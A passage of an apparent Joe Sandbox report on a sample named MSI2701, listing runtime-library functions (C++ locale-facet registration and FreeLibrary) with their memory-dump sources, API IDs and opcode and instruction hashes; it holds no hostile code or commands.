                                                                                                                                                            • Opcode Fuzzy Hash: b6b05206ae5c93c61bc63f2b671f175afb227e497d35c13344e4595937f7fab7
                                                                                                                                                            • Instruction Fuzzy Hash: 1511D2B2E04658DFDB10CF54ED46B9EB7A8F728710F10466AEC11933D0E7796904CA51
                                                                                                                                                            Function 004E69E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,004E6AA3,?,?,0051DDCC,00000000,?,004E6BCE,00000004,InitializeCriticalSectionEx,005097E8,InitializeCriticalSectionEx,00000000), ref: 004E6A72
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                            • API String ID: 3664257935-2084034818
                                                                                                                                                            • Opcode ID: e51c651ce81335c2941d3b44d2c6e83189ec908890b8d353853c53281727b932
                                                                                                                                                            • Instruction ID: 919658207358bc46896800fb0f2bf180828f40eb874e755df52f68c44f3aaf6d
                                                                                                                                                            • Opcode Fuzzy Hash: e51c651ce81335c2941d3b44d2c6e83189ec908890b8d353853c53281727b932
                                                                                                                                                            • Instruction Fuzzy Hash: 5B11C432E00265ABCB229B6A9C4475E37A49F237B2F164272F914B7380D664ED0086D9
                                                                                                                                                            Function 004CD752 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004CD759
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004CD763
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004CD7B4
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004CD7D4
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: 01a3ecea5927e0c79f3dabf22a1a5664e09e470de2295260f501cbd8363d9133
                                                                                                                                                            • Instruction ID: 78e36f33f18765319d1145b8a793778b506104a837391e4e372c1331dd688868
                                                                                                                                                            • Opcode Fuzzy Hash: 01a3ecea5927e0c79f3dabf22a1a5664e09e470de2295260f501cbd8363d9133
                                                                                                                                                            • Instruction Fuzzy Hash: 4201AD39D001199BCB05AB618855BBE77B1BF84718F24041FE9016B3D1DF789E018BA9
                                                                                                                                                            Function 004D270D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2714
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D271E
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D276F
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D278F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: 8b9f724d38e83b4adc8f049f257b72c072d8c29d105ebd6a9c315b27b79f1153
                                                                                                                                                            • Instruction ID: d2a986c007caa2fc2a0ad74e41d18988a50306f06a7f71ca5ba0e052fd725d8b
                                                                                                                                                            • Opcode Fuzzy Hash: 8b9f724d38e83b4adc8f049f257b72c072d8c29d105ebd6a9c315b27b79f1153
                                                                                                                                                            • Instruction Fuzzy Hash: C901C03990012ADBCB15EB618919BBEB7B0BF94715F24050FE41067392DF789E058BA9
                                                                                                                                                            Function 004CD7E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004CD7EE
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004CD7F8
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004CD849
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004CD869
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: 541a20148a329cb69f34bda73c47dce86ddb4bc73569d85bf8621ccfc00e180d
                                                                                                                                                            • Instruction ID: dbb3e2933e7d5dbec27e1d476f64abee57e7d00c1999ef91a0b3198e20587e84
                                                                                                                                                            • Opcode Fuzzy Hash: 541a20148a329cb69f34bda73c47dce86ddb4bc73569d85bf8621ccfc00e180d
                                                                                                                                                            • Instruction Fuzzy Hash: 5301CB39C00119EBCB05BB618806BBE77A0AF90724F24045FE4106B391CF3C9E018BA9
                                                                                                                                                            Function 004D27A2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D27A9
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D27B3
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2804
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2824
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: a50a16bd1d89276a4a83caafbf547dc897f906c8b7d81a3c465053836748d5a5
                                                                                                                                                            • Instruction ID: 805da9a4615168679c7b3122dc3f384baf14e99c6f80712597bed0536bbd1337
                                                                                                                                                            • Opcode Fuzzy Hash: a50a16bd1d89276a4a83caafbf547dc897f906c8b7d81a3c465053836748d5a5
                                                                                                                                                            • Instruction Fuzzy Hash: 170104358002159BCB01EB658915BBE77B0BF94715F24050FF90067392CF789E0197A9
                                                                                                                                                            Function 004D2837 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D283E
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2848
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2899
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D28B9
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: dedcb2d5fd0a473e2501a1cde3f70b6eda9c794c7533cfc5ef7d30cc85ff6d9d
                                                                                                                                                            • Instruction ID: fada91d35eb481430117022b549024b21bc923fd12a2826e19d43131190ce30f
                                                                                                                                                            • Opcode Fuzzy Hash: dedcb2d5fd0a473e2501a1cde3f70b6eda9c794c7533cfc5ef7d30cc85ff6d9d
                                                                                                                                                            • Instruction Fuzzy Hash: 20018B359001299BCB05EB618915ABE77A1BF94714F24060FF401A7392DF789E059BAA
                                                                                                                                                            Function 004D28CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D28D3
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D28DD
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D292E
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D294E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: 7354921775008aec716b6f204e8f4985e53a47d9105a4b29e04f96bbc354bbd9
                                                                                                                                                            • Instruction ID: d0bfdd55ae73ffbe70296b88b2cb4d569f01319e0290caf5b42c8a7bfb7658e4
                                                                                                                                                            • Opcode Fuzzy Hash: 7354921775008aec716b6f204e8f4985e53a47d9105a4b29e04f96bbc354bbd9
                                                                                                                                                            • Instruction Fuzzy Hash: 64010475900115DBCB01EB618925BBE77B1BF94724F24044FE51067391CFB89E018B99
                                                                                                                                                            Function 004DE96D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DE974
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DE97E
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DE9CF
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DE9EF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: d3d0dbbbf14b028fd914fdc2688d40ec1b46fd6ffb6c4fb5e72b88ae1380fe6b
                                                                                                                                                            • Instruction ID: d0736dea23b680b5e4d6d44d6cdafc956d857d506cf1d56d25cca98a6954b198
                                                                                                                                                            • Opcode Fuzzy Hash: d3d0dbbbf14b028fd914fdc2688d40ec1b46fd6ffb6c4fb5e72b88ae1380fe6b
                                                                                                                                                            • Instruction Fuzzy Hash: 1501C0759011199BCB05FB668865BBF77B4BF84714F24044FF5006B392CF789E019BA9
                                                                                                                                                            Function 004DEA02 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DEA09
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DEA13
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DEA64
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DEA84
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: 3a9ae3ebd00622659214a98f1e361b0d1d52c7161ee2cd0cbbb312d4764cd428
                                                                                                                                                            • Instruction ID: fbe499bf6edd36c97c54005a5ce335ecdd161ce85514aa7a7dd8731c6594f919
                                                                                                                                                            • Opcode Fuzzy Hash: 3a9ae3ebd00622659214a98f1e361b0d1d52c7161ee2cd0cbbb312d4764cd428
                                                                                                                                                            • Instruction Fuzzy Hash: 7C01AD3590011ADBCB05FB6288A5BBE77B0BF94714F25040FE5006B391DF789E018BAA
                                                                                                                                                            Function 004DEBC1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DEBC8
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DEBD2
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DEC23
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DEC43
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: fb13fb0bb266c6d61183b5707de781b97a41de1dcbdd846f11e8d6ae40a84733
                                                                                                                                                            • Instruction ID: d35d7e0efb8d8549e2186ed4d23f3e64f77003770fdd8bdd68409e3859cf8dae
                                                                                                                                                            • Opcode Fuzzy Hash: fb13fb0bb266c6d61183b5707de781b97a41de1dcbdd846f11e8d6ae40a84733
                                                                                                                                                            • Instruction Fuzzy Hash: FA01C4359001199BCB15FB62C815BBE77B0BF94714F24084FE5106B3D1DF78AE05879A
                                                                                                                                                            Function 004D2BB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2BBC
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2BC6
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2C17
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2C37
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: b3a944323c42b89b312a9a543878ace2a1101250d62229ab112b40dcc24def71
                                                                                                                                                            • Instruction ID: c7b7094af4f2ec43b1e843471f74760d7695a92f87fa3ad7b8bff6274e9d85c8
                                                                                                                                                            • Opcode Fuzzy Hash: b3a944323c42b89b312a9a543878ace2a1101250d62229ab112b40dcc24def71
                                                                                                                                                            • Instruction Fuzzy Hash: 18010035900159DBCB15EB659815BBE77B0BFA0714F24440FF4006B391CFB89E05CBA9
                                                                                                                                                            Function 004D2C4A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2C51
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2C5B
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2CAC
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2CCC
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: b49621489ced6985e6fd1f0840259fe4d41d3ef7af3ea85c891ad44eb476e548
                                                                                                                                                            • Instruction ID: 1a95dbd1113bdd987a1147d17b7a2dfd4a2d77f0f5711c6ba05589851667137a
                                                                                                                                                            • Opcode Fuzzy Hash: b49621489ced6985e6fd1f0840259fe4d41d3ef7af3ea85c891ad44eb476e548
                                                                                                                                                            • Instruction Fuzzy Hash: E8010039800119EBCB05EBA18915BBE77B0BF90B14F24040FF40067391CFB89E009BA9
                                                                                                                                                            Function 004DEC56 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DEC5D
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DEC67
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DECB8
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DECD8
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: 1f91699d3e2973d45411005edf02c51e353277c2ba33d15c41a3ddac865fd465
                                                                                                                                                            • Instruction ID: bcd2b05ac5275eb03e8de647601a2d14b15e53dbb1c4affd75d71b002e8ffb70
